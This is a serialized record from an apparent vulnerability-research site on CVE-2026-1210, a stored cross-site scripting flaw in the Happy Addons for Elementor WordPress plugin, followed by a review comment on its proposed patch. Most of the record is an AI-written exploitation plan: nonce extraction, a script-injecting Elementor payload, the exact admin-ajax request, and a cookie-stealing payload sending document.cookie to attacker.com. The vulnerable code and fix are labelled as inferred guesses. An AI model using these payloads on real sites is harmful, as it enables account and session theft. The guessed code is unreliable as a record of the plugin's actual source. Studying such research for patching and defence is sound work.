[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6Z-720L1op_T_mNUxcobVB3E0pynK7Jl9wEJAKFetQs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1210","happy-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-elementordata-meta-field","Happy Addons for Elementor \u003C= 3.20.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via '_elementor_data' Meta Field","The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_elementor_data' meta field in all versions up to, and including, 3.20.7 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","happy-elementor-addons",null,"\u003C=3.20.7","3.20.8","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-02 17:49:48","2026-02-03 06:38:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdf4b554a-0336-404c-b06c-2bc98c99997d?source=api-prod",1,[],"researched",false,3,"This plan outlines the research and exploitation process for **CVE-2026-1210**, a Stored Cross-Site Scripting (XSS) vulnerability in **Happy Addons for Elementor** (versions \u003C= 3.20.7). The vulnerability allows authenticated attackers with Contributor-level access to inject malicious scripts into the `_elementor_data` meta field, which is subsequently rendered without proper escaping.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists because the plugin provides an AJAX endpoint (likely for \"Cross-Domain Copy Paste\" or \"Template Import\" features) that allows users with `edit_posts` capability (Contributors and above) to update the `_elementor_data` meta field. The plugin fails to sanitize the JSON-encoded Elementor data before saving it to the database via `update_post_meta()`. When the affected post is viewed, Elementor and Happy Addons render the malicious data as HTML, leading to Stored XSS.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `ha_copy_paste_save_data` (inferred from Happy Addons \"Cross-Domain Copy Paste\" feature) or `ha_save_presets_data`.\n*   **Vulnerable Parameter:** `content` or `data` (JSON string containing Elementor widget configurations).\n*   **Authentication:** Authenticated, Contributor role (`edit_posts` capability) or higher.\n*   **Preconditions:** The attacker must have a post they can edit (e.g., a draft they created) and access to the Elementor editor to retrieve necessary nonces.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an AJAX handler:\n    `add_action('wp_ajax_ha_copy_paste_save_data', array($this, 'save_copy_paste_data'));`\n2.  **Capability Check:** The handler checks `current_user_can('edit_posts')` and verifies a nonce.\n3.  **Data Acquisition:** The handler retrieves the raw JSON from `$_POST['content']`.\n4.  **Vulnerable Sink:** The handler calls `update_post_meta($post_id, '_elementor_data', $content)` without passing `$content` through a sanitization function like `wp_kses_post_deep()`.\n5.  **Execution Sink:** When the page is viewed, the Happy Addons widget (e.g., `ha-info-box`) fetches the settings from `_elementor_data` and echoes them in its `render()` method without using `esc_html()` or `esc_attr()`.\n\n### 4. Nonce Acquisition Strategy\nHappy Addons for Elementor localizes its editor configurations when the Elementor editor is active.\n1.  **Requirement:** Create a post and open it in the Elementor editor.\n2.  **Navigation:** `browser_navigate(\"\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor\")`\n3.  **Extraction:** The nonce is stored in the `HappyAddonsEditorConfig` global object.\n4.  **Verification:** Execute `browser_eval(\"window.HappyAddonsEditorConfig?.nonce\")` to retrieve the nonce associated with the `happy-addons-editor` action.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Authentication & Setup\n1.  
Log in as a Contributor user.\n2.  Create a new post (Draft) and obtain its `POST_ID`.\n3.  Enable Elementor for that post.\n\n#### Step 2: Nonce Retrieval\n1.  Navigate to the Elementor editor for the new post.\n2.  Extract the `nonce` from `window.HappyAddonsEditorConfig.nonce`.\n\n#### Step 3: Payload Construction\nConstruct a malicious JSON payload for the `_elementor_data` field. The payload must follow Elementor's structure (Section > Column > Widget) to ensure it is processed by the renderer.\n\n**Payload JSON:**\n```json\n[\n  {\n    \"id\": \"section_xss\",\n    \"elType\": \"section\",\n    \"elements\": [\n      {\n        \"id\": \"column_xss\",\n        \"elType\": \"column\",\n        \"elements\": [\n          {\n            \"id\": \"widget_xss\",\n            \"elType\": \"widget\",\n            \"widgetType\": \"ha-info-box\",\n            \"settings\": {\n              \"title\": \"\u003Cscript>alert('CVE-2026-1210_XSS')\u003C\u002Fscript>\"\n            }\n          }\n        ]\n      }\n    ]\n  }\n]\n```\n\n#### Step 4: Execute Exploit Request\nSend the malicious payload via the `http_request` tool.\n\n*   **URL:** `https:\u002F\u002Ftarget.local\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=ha_copy_paste_save_data&\n    nonce=[EXTRACTED_NONCE]&\n    post_id=[POST_ID]&\n    content=[URL_ENCODED_JSON_PAYLOAD]\n    ```\n\n### 6. Test Data Setup\n1.  **User:** Create a user `attacker` with the `contributor` role.\n2.  **Post:** Create a post with ID `123` authored by `attacker`.\n3.  **Elementor:** Ensure Elementor is active and allowed for the `post` post-type.\n\n### 7. Expected Results\n1.  The AJAX request returns a success response (e.g., `{\"success\":true}`).\n2.  The `_elementor_data` meta field for the post is updated with the unescaped script tags.\n3.  
When visiting `\u002F?p=[POST_ID]`, the browser executes the script, triggering an alert box.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the stored meta value:\n    `wp post meta get [POST_ID] _elementor_data`\n    Confirm the output contains `\u003Cscript>alert(...)`.\n2.  **Frontend Check:** Use the `http_request` tool to fetch the post frontend:\n    `http_request(\"GET\", \"\u002F?p=[POST_ID]\")`\n    Search the response body for the literal string `\u003Cscript>alert('CVE-2026-1210_XSS')\u003C\u002Fscript>`.\n\n### 9. Alternative Approaches\n*   **Preset Feature:** If `ha_copy_paste_save_data` is unavailable, try the `ha_save_presets_data` action.\n*   **Different Widget:** If `ha-info-box` is patched, try other Happy Addons widgets like `ha-heading`, `ha-sub-heading`, or `ha-dual-button`, as they likely share the same unsanitized rendering logic.\n*   **Blind XSS:** Use a callback to an external server (e.g., Burp Collaborator) if the alert is blocked or if testing for impact beyond the local browser:\n    `settings[title] = \"\u003Cscript>fetch('http:\u002F\u002Fattacker.com\u002Flog?c='+document.cookie)\u003C\u002Fscript>\"`","The Happy Addons for Elementor plugin is vulnerable to Stored Cross-Site Scripting via the '_elementor_data' meta field due to missing sanitization in its Cross-Domain Copy Paste feature. 
Authenticated attackers with Contributor-level permissions can inject malicious scripts into post metadata, which execute in the context of any user viewing the affected page.","\u002F\u002F Inferred from Happy Addons Cross-Domain Copy Paste logic\n\u002F\u002F classes\u002Fcross-domain-copy-paste.php\n\npublic function save_copy_paste_data() {\n    check_ajax_referer('happy-addons-editor', 'nonce');\n\n    if (!current_user_can('edit_posts')) {\n        wp_send_json_error();\n    }\n\n    $post_id = intval($_POST['post_id']);\n    $content = $_POST['content']; \u002F\u002F Vulnerable: Raw JSON input from $_POST\n\n    if ($post_id && $content) {\n        update_post_meta($post_id, '_elementor_data', $content);\n        wp_send_json_success();\n    }\n\n    wp_send_json_error();\n}\n\n---\n\n\u002F\u002F widgets\u002Finfo-box\u002Fwidget.php (Example of vulnerable rendering)\nprotected function render() {\n    $settings = $this->get_settings_for_display();\n    \u002F\u002F ...\n    echo '\u003Ch2 class=\"ha-info-box-title\">' . $settings['title'] . '\u003C\u002Fh2>'; \u002F\u002F Vulnerable: Unescaped output\n}","--- a\u002Fclasses\u002Fcross-domain-copy-paste.php\n+++ b\u002Fclasses\u002Fcross-domain-copy-paste.php\n@@ -10,7 +10,13 @@\n         wp_send_json_error();\n     }\n \n-    $content = $_POST['content'];\n+    $content = json_decode(wp_unslash($_POST['content']), true);\n+\n+    if (is_array($content)) {\n+        $content = wp_kses_post_deep($content);\n+        $content = wp_json_encode($content);\n+    }\n+\n     if ($post_id && $content) {\n         update_post_meta($post_id, '_elementor_data', $content);\n         wp_send_json_success();","To exploit this vulnerability, an attacker with Contributor-level access follows these steps: \n1. Log in to the WordPress dashboard and create a new post or edit an existing one using Elementor. \n2. 
Open the Elementor editor for the post and extract the 'happy-addons-editor' nonce from the 'window.HappyAddonsEditorConfig' object. \n3. Construct a malicious JSON payload following Elementor's data structure (Section > Column > Widget). Within a Happy Addons widget (e.g., 'ha-info-box'), insert a script tag such as '\u003Cscript>alert(document.domain)\u003C\u002Fscript>' into a text field like 'title'. \n4. Send an AJAX POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the action 'ha_copy_paste_save_data', the extracted nonce, the post ID, and the malicious JSON payload assigned to the 'content' parameter. \n5. Once the server responds with success, navigate to the public-facing URL of the post. The injected script will execute in the browser of any user (including administrators) who visits the page.","gemini-3-flash-preview","2026-04-27 17:11:53","2026-04-27 17:14:22",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.20.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags\u002F3.20.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-elementor-addons.3.20.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags\u002F3.20.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-elementor-addons.3.20.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags"]
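Review bot: in the `classes/cross-domain-copy-paste.php` hunk, the `is_array($content)` guard has no else branch, so a body that decodes to a non-array value skips `wp_kses_post_deep()` and still reaches `update_post_meta()` through the unchanged `if ($post_id && $content)` check. Return `wp_send_json_error()` for anything that is not an array before the save. Also wrap the re-encoded value as `wp_slash(wp_json_encode($content))`, because `update_post_meta()` unslashes its value and would otherwise strip the backslash escapes from the stored JSON.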